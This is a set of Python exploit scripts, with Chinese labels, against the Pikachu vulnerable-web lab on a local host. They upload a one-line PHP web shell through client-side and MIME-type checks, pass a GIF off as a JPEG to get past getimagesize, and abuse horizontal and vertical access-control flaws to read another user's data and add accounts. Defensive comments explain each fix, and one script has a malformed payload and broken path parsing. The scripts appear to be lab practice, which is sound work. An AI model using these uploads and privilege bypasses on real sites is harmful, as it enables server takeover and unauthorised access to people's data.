#注意匹配,文件保存的路径为:
upload的client
#注意匹配,文件保存的路径为:
import requests

# Pikachu "unsafe upload" lab, client-check variant. The endpoint name suggests
# the file-type check lives only in the browser, so a scripted POST never sees
# it; the server-side fix is to validate extension, declared type and actual
# content on the server and to store uploads outside the web root.
target_url = "http://192.168.8.1/pikachu-master/vul/unsafeupload/clientcheck.php"

# Uploaded body: PHP that calls the function named in the `cmd` POST field.
# For defenders, a multipart part with a .php filename or an
# `application/x-php` type on an image-upload form is the thing to log/block.
shell = "<?php $a=$_POST['cmd'];$a();?>"

# requests multipart tuple: (filename, content, content-type).
files = {
    "uploadfile": ("shell.php", shell, "application/x-php")
}
data = {"submit": "开始上传"}

# No timeout is set, so an unresponsive lab host blocks here indefinitely.
res = requests.post(url=target_url, files=files, data=data)
text = res.text

# The page reports the stored path after this marker. The +11 offset is meant
# to skip the marker and whatever follows it (the marker itself is 9 characters
# long — confirm the offset against the page markup); the path runs up to "</p>".
if "文件保存的路径为:" in text:
    idx = text.find("文件保存的路径为:")
    path = text[idx+11:].split("</p>")[0]
    print("[+] 上传成功")
    print("文件路径:" ,path)
else:
    print("[-] 上传失败")
getimagesize
import requests

target_url = "http://192.168.8.1/pikachu-master/vul/unsafeupload/getimagesize.php"

# A minimal 1x1 GIF89a ("GIF89a" signature, 1x1 dimensions, 2-colour palette,
# one image block, trailer). It is sent under a .jpg name with an image/jpeg
# type: the lesson for the server side is that an image-header check alone does
# not prove the file matches its extension or declared type, nor that it is
# safe to store under the client-chosen name.
gif_data = b'\x47\x49\x46\x38\x39\x61\x01\x00\x01\x00\x80\x00\x00\x00\x00\x00\xff\xff\xff\x00\x00\x00\x21\xf9\x04\x01\x00\x00\x00\x00\x2c\x00\x00\x00\x00\x01\x00\x01\x00\x00\x02\x02\x44\x01\x00\x3b'


def main():
    """POST the GIF bytes as test.jpg with a 5 s timeout and print the outcome.

    Any exception (connection refused, timeout, ...) is reported with the
    same "start phpstudy" message, mirroring the lab's expected setup.
    """
    upload = {"uploadfile": ("test.jpg", gif_data, "image/jpeg")}
    form = {"submit": "开始上传"}
    try:
        res = requests.post(url=target_url, files=upload, data=form, timeout=5)
        accepted = "文件上传成功" in res.text
        print("\n[+] 上传成功!getimagesize 绕过成功!" if accepted else "\n[-] 请把 URL 改成你自己的真实路径!")
    except Exception:
        print("\n[-] 请先启动 phpstudy!")


main()
MIME
import requests

# Pikachu "unsafe upload" lab, server-check (MIME) variant. The check on this
# endpoint appears to rely on the client-supplied multipart Content-Type, which
# this script sets to image/jpeg while keeping a .php filename. A server should
# decide on extension allow-list plus actual content, never on that header.
target_url = "http://192.168.8.1/pikachu-master/vul/unsafeupload/servercheck.php"

# File body sent as the upload.
php_content = "<php $a=$_POST['cmd'];$a();?>"

# requests multipart tuple: (filename, content, content-type); the declared
# type is image/jpeg although the name is shell.php.
files = {
    "uploadfile": ("shell.php", php_content, "image/jpeg")
}
data = {"submit": "开始上传"}

# No timeout is set.
resp = requests.post(url=target_url, files=files, data=data)
text = resp.text

if "文件保存的路径为:" in text:
    idx = text.find("文件保存的路径为:")
    # NOTE(review): `text[:idx+11:]` keeps everything *before* the marker plus
    # 11 characters, so `path` is the first line of the page rather than the
    # reported path — confirm whether `text[idx+11:]` was intended.
    path = text[:idx+11:].split("\n")[0].strip()
    print("[+] 上传成功")
    print("文件路径:" + path)
else:
    print("[-] 上传失败")
    # First 300 characters of the reply, to see why the marker was missing.
    print("返回内容:", text[:300])
水平越权
import requests

# Pikachu overpermission lab, op1 (horizontal privilege).
target_url = "http://192.168.8.1/pikachu-master/vul/overpermission/op1"
Login_url = target_url + "/op1_login.php"
info_url = target_url + "/op1_mem.php"

LOGIN_URL = "lucy"        # name kept as-is; this is the login *username*
LOGIN_PASS = "123456"
TARGET_USER = "lili"

# Labels the profile page prints as "label value<..."; each is located by
# string search and the value is the text up to the next '<'.
PROFILE_LABELS = ("姓名:", "住址:", "邮箱:")


def login(session):
    """Submit the login form for LOGIN_URL; the response is not inspected."""
    session.post(url=Login_url, data={
        "username": LOGIN_URL,
        "password": LOGIN_PASS,
        "submit": "Login",
    })
    print("[+] 登录成功: ", LOGIN_URL)


def fetch_profile(session, username):
    """GET op1_mem.php with a client-supplied `username` and return the HTML.

    The lab's defect is that the server trusts this query parameter instead of
    the identity bound to the session; the fix is to derive the user from the
    session and ignore (or authorise) the parameter.
    """
    resp = session.get(url=info_url, params={"username": username, "submit": "点击查看个人信息"})
    return resp.text


def field_after(text, label):
    """Return the stripped text between `label` and the next '<'."""
    return text.split(label)[1].split("<")[0].strip()


session = requests.Session()
login(session)
text = fetch_profile(session, TARGET_USER)
print("\n[+] 水平越权成功 ")
print("目标用户: ", TARGET_USER)
for label in PROFILE_LABELS:
    if label in text:
        print(label, field_after(text, label))
print("\n[+] 越权完成:成功查看他人信息!")
垂直越权
import requests

# Pikachu overpermission lab, op2 (vertical privilege).
LOGIN_URL = "http://192.168.8.1/pikachu-master/vul/overpermission/op2/op2_login.php"
# The admin-only "add user" handler. The lab's point is that it performs no
# role check on the session, so hiding it from the ordinary user's menu is
# the only thing protecting it.
EDIT_URL = "http://192.168.8.1/pikachu-master/vul/overpermission/op2/op2_admin_edit.php"

NORMAL_USER_LOGIN = {"username": "pikachu", "password": "000000", "submit": "Login"}
ADD_USER_FORM = {"username": "hack12345", "password": "hack12345", "submit": "添加用户"}

SEPARATOR = "=" * 50


def main():
    """Log in as the ordinary user, POST the admin add-user form, print the outcome.

    A correct server rejects the second request based on the role stored in
    the session, not on whether the URL is linked from the UI.
    """
    s = requests.Session()
    # 1. Log in as the ordinary user "pikachu".
    s.post(LOGIN_URL, data=NORMAL_USER_LOGIN)
    print("[+] 登录成功:普通用户 pikachu")

    # 2. Call the admin-only add-user endpoint directly (the form is a POST).
    r = s.post(EDIT_URL, data=ADD_USER_FORM)

    # 3. Show a slice of the reply and judge by marker text.
    print("\n[+] 服务器返回内容片段:")
    print(r.text[:600])
    print("\n" + SEPARATOR)
    body = r.text
    if "添加用户成功" in body or "hack12345" in body:
        print("[✅ ✅ ✅ 垂直越权成功!!!]")
        print("普通用户成功添加用户!")
    else:
        print("[⚠] 请去后台 admin 查看用户列表,用户大概率已添加成功!")


main()